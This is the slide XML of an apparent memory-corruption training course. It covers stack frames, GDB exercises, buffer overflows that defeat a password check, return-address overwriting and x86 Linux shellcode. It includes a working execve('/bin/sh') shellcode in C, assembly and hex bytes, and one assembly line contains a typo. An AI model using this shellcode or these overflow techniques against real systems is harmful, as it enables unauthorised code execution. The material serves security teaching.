            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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6" name="Google Shape;426;g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1, int num2, int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1604645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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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7" name="Google Shape;427;g24e5311e72c_0_311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_325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Exercise: memcor/stackDemo/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;g24e5311e72c_0_325"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1457200"/>
            <a:ext cx="10515600" cy="506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Objective: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Understand how the stack is used during a function call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Procedure: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Compile code and debug program using GDB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cd ~/ACE_2022/distro/memcor/stackDemo/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SzPts val="1800"/>
              <a:buChar char="■"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$ make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SzPts val="1800"/>
              <a:buChar char="■"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$ gdb stackDemo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Observe the contents of the stack during runtime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Set a breakpoint right after the function call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(gdb) break myFunction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Run program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(gdb) run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Step through execution after halting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(gdb) next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View memory contents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(gdb) x/20xw buffer2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View register contents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(gdb) info registers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4e5311e72c_0_331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Exercise: memcor/readData0/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Google Shape;441;g24e5311e72c_0_331"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1392175"/>
            <a:ext cx="10515600" cy="478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Objective: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Observe a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> overflow in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Procedure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Compile and debug program using GDB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cd ~/ACE_2023/distro/memcor/readData0/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make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gdb readData0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Set a breakpoint right after function call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(gdb) break myFunction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Run Program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(gdb) run [fileName]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Step through execution after halting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(gdb) next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View memory contents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before and after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> copy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(gdb) x/20xw dataBuffer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4e5311e72c_0_337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Stack Frame Layout: readData0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="448" name="Google Shape;448;g24e5311e72c_0_337"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1822450" y="1365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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff???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&amp;filename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saved EIP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saved EBP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35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&amp;filePointer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3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dataBuffer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35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dataBuffer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dataBuffer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dataBuffer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dataBuffer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0x00000004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57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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;g24e5311e72c_0_337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362450" y="2180873"/>
            <a:ext cx="1159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Start of stack frame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g24e5311e72c_0_337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4394032" y="4043422"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129020" y="1267916"/>
            <a:ext cx="33330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0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void myFunction(char *fileName)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39419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FILE* filePointer;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2" name="Google Shape;452;g24e5311e72c_0_337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6555811" y="2005531"/>
            <a:ext cx="3119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0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char dataBuffer[20] = {'\0'};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3" name="Google Shape;453;g24e5311e72c_0_337"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129020" y="2775660"/>
            <a:ext cx="1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4e5311e72c_0_349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Exercise: memcor/authFlag/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;g24e5311e72c_0_34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Objective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Defeat password authentication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Procedure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Compile code and analyze program behavior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cd ~/ACE_2023/distro/memcor/authFlag/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make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echo “password” &gt; password.txt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./authFlag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Identify weakness and suggest remedy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4e5311e72c_0_355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Exercise: memcor/authFlag/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="467" name="Google Shape;467;g24e5311e72c_0_355"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="1365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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff???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parameters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saved EIP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saved EBP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35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local variables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57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0x00000004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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;g24e5311e72c_0_355"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443220" y="1344116"/>
            <a:ext cx="49332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27354" lvl="0" marL="439419" marR="1925320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int check_authentication() { int auth_flag = 0; FILE* filePointer;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39419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char password_buffer[12];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2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3941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427354" lvl="0" marL="866139" marR="5080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if(strcmp(password_buffer, "secret") == 0) auth_flag = 1;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2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3941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return auth_flag;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4e5311e72c_0_363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Exercise: memcor/authFlag/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="475" name="Google Shape;475;g24e5311e72c_0_363"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="1365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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff???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&lt;no parameters&gt;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saved EIP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saved EBP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35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auth_flag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&amp;filePointer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password_buffer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password_buffer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password_buffer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0" marL="8382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5750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0x00000004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0" marL="123188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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;g24e5311e72c_0_363"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5488940" y="1344116"/>
            <a:ext cx="49332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27354" lvl="0" marL="439419" marR="1925320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int check_authentication() { int auth_flag = 0; FILE* filePointer;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39419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char password_buffer[12];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2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3941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427354" lvl="0" marL="866139" marR="5080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if(strcmp(password_buffer, "secret") == 0) auth_flag = 1;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2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3941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return auth_flag;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4e5311e72c_0_371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Return Address Mangling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;g24e5311e72c_0_37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When exiting a function, the program needs to know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> instruction to execute next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The instruction pointer (EIP) is set to the saved EIP from the stack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The saved EIP is therefore the “return address” of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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What happens if we overwrite the return address of the function?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We can Deliberately execute instructions that reside in a program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> space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838200" y="308565"/>
            <a:ext cx="10515600" cy="889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Instructor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115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ACE 2013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Air Force Reserves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51</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-US"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> NOS Flight Commander, Developer Flight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Previously Network Protection Flight/CC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Previously Weapons and Tactics Flight/CC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Previously Active Duty with AF Office of Special Investigations (AFOSI)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Civilian Job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Two Six Technologies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Windows CNO Software Developer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Academics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B.S Computer Engineering Virginia Tech 2015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M.Eng Computer Engineering Virginia Tech, est 2023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4e5311e72c_0_377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Instruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Pointer (EIP)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;g24e5311e72c_0_37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Inside of a function: the EIP increments after every instruction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EIP = EIP + 1*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Calling a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function: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EIP+1 is saed on the stack and the EIP is set to the address of the function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push (EIP + 1)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EIP = &amp;function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Exiting a function: the saved EIP (return address) is retrieved from the stack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EIP = pop(saved EIP)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4e5311e72c_0_383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Instructions in memory (memcor/stackDemo)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="497" name="Google Shape;497;g24e5311e72c_0_3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905000"/>
            <a:ext cx="3896564" cy="254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g24e5311e72c_0_3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8400" y="1399001"/>
            <a:ext cx="3857744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g24e5311e72c_0_3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57400" y="5331812"/>
            <a:ext cx="7772401" cy="1080654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g24e5311e72c_0_383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="4385044"/>
            <a:ext cx="1158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Source code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g24e5311e72c_0_383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6422721" y="4388374"/>
            <a:ext cx="34722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x86 assembly instructions in memory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g24e5311e72c_0_383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4574540" y="6401385"/>
            <a:ext cx="28161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Actual instructions in memory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3" name="Google Shape;503;g24e5311e72c_0_383"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5638800" y="3276600"/>
            <a:ext cx="457200" cy="228600"/>
            <a:chOff x="4343400" y="2895600"/>
            <a:chExt cx="457200" cy="228600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="504" name="Google Shape;504;g24e5311e72c_0_383"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4343400" y="2895600"/>
              <a:ext cx="457200" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="228600" w="457200">
                  <a:moveTo>
                    <a:pt x="342900" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="342900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342900" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="1143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g24e5311e72c_0_383"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4343400" y="2895600"/>
              <a:ext cx="457200" cy="228600"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="228600" w="457200">
                  <a:moveTo>
                    <a:pt x="342900" y="171450"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="342900" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900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342900" y="171450"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="3A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g24e5311e72c_0_383"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7505150" y="4781425"/>
            <a:ext cx="228600" cy="457200"/>
            <a:chOff x="6209750" y="4400425"/>
            <a:chExt cx="228600" cy="457200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="507" name="Google Shape;507;g24e5311e72c_0_383"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6209750" y="4400425"/>
              <a:ext cx="228600" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="457200" w="228600">
                  <a:moveTo>
                    <a:pt x="171450" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="34290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g24e5311e72c_0_383"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6209750" y="4400425"/>
              <a:ext cx="228600" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="457200" w="228600">
                  <a:moveTo>
                    <a:pt x="57150" y="342900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171450" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="342900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="3A5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4e5311e72c_0_401"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660875" y="248975"/>
            <a:ext cx="111372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559"/>
              <a:t>Exercise: memcor/returnAddressMangleCode</a:t>
            </a:r>
            <a:endParaRPr sz="3559"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;g24e5311e72c_0_40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Objective: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Modify the expected flow of execution of a program by updating the source code of the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Procedure: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Compile and use GDB to find desired address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make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gdb returnAddressMangleCode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(gdb) disassemble main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Update source code and re-compile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code returnAddressMangleCode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make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./returnAddressMangleCode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4e5311e72c_0_407"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="232375"/>
            <a:ext cx="108393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9"/>
              <a:t>Exercise: memcor/returnAddressMangleRuntime</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;g24e5311e72c_0_40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Objective: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Modify the flow of execution of a program at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run-time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Procedure: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Compile and use GDB to find desired address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make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gdb returnAddressMangleRuntime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(gdb) disassemble main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Create exploit input file with python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code exploit.py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python3 exploit.py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Run program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> input file that overwrites return address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./returnAddressMangleRuntime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4e5311e72c_0_413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Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Google Shape;529;g24e5311e72c_0_4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observed how to change the return address to an arbitrary location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Altered program behavior by skipping or replaying instructions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Instructions were already in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However we wish to execute </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US"/>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> instructions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Shellcode is machine code specially crafted to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> into a vulnerable program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Traditionally called “shellcode” since it is most often used to spawn an interactive shell (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/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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Operating System and Architecture-specific: we will focus on Linux/Intel x86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4e5311e72c_0_419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Sample Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="Google Shape;536;g24e5311e72c_0_419"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1312250"/>
            <a:ext cx="10515600" cy="532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5437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525"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150"/>
              <a:t>C code</a:t>
            </a:r>
            <a:endParaRPr sz="2150"/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962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96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   char command[] = "/bin/sh\x00";</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   char ** argv, ** envp; // arrays that contain char pointers</a:t>
            </a:r>
            <a:endParaRPr sz="96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96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   argv[0] = command; // only argument is the command</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   argv[1] = 0; // null terminate the argument array</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   envp[0] = 0; // null terminate the environment array</a:t>
            </a:r>
            <a:endParaRPr sz="96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96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   execve(command, argv, envp);</a:t>
            </a:r>
            <a:endParaRPr sz="96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962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150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-325437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525"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
            <a:endParaRPr sz="2150"/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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>; execve(const char *filename, char*const argv[], char* const envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor eax, eax    ; zero out eax</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>push eax        ; push some nulls for string termination</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>push 0x68732f2f ; push "//sh" to the stack</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>push 0x6e69622f ; push "/bin" to the stack</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov ebx, esp    ; put the address of "/bin//sh" into ebx, via esp</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>push eax        ; push 32-bit null terminator to stack</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov edx, esp    ; empty array for envp</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>push ebx        ; push string addr to stack above null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>terminator</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov ecx, esp    ; this is the argv array with string ptr</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov a1, 11      ; syscall #11</a:t>
            </a:r>
            <a:endParaRPr sz="96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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int 0x80        ; do it</a:t>
            </a:r>
            <a:endParaRPr sz="2150"/>
          </a:p>
          <a:p>
            <a:pPr indent="-325437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525"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150"/>
              <a:t>Machine code (i.e. shellcode)</a:t>
            </a:r>
            <a:endParaRPr sz="2150"/>
          </a:p>
          <a:p>
            <a:pPr indent="45720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962">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 50 89 e2 53 89 e1 b0 0b cd 80</a:t>
            </a:r>
            <a:endParaRPr sz="21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4e5311e72c_0_429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Shellcode in our exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;g24e5311e72c_0_42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Ways to write shellcode for exploits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Compile from C or assembly and extract from binary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Find examples on internet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use with caution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>)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http://shell-storm.org/shellcode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http://www.exploit-db.com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Modify shellcode for custom exploit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How will we use shellcode?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Insert shellcode into program memory through a buffer overflow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Change saved return address to point to our shellcode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When the vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> exits, our shellcode will be executed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4e5311e72c_0_435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Demonstration: memcor/shellcodeDemo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;g24e5311e72c_0_43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Objective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Observe execution of shellcode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Procedure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Play with shellcode provided in source code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make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./shellcodeDemo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Write shellcode to binary file (shellcraft demo)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python3 -c ‘import sys; sys.stdout.write(“\x…”)’ &gt; out.bin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Display binary file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cat out.bin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ghex out.bin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Disassemble shellcode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objdump -b binary -m i386 -D out.bin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4e5311e72c_0_441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Memory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="557" name="Google Shape;557;g24e5311e72c_0_441"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5327903" y="1638300"/>
            <a:ext cx="1421764" cy="3924299"/>
            <a:chOff x="3880103" y="1257300"/>
            <a:chExt cx="1421764" cy="3924299"/>
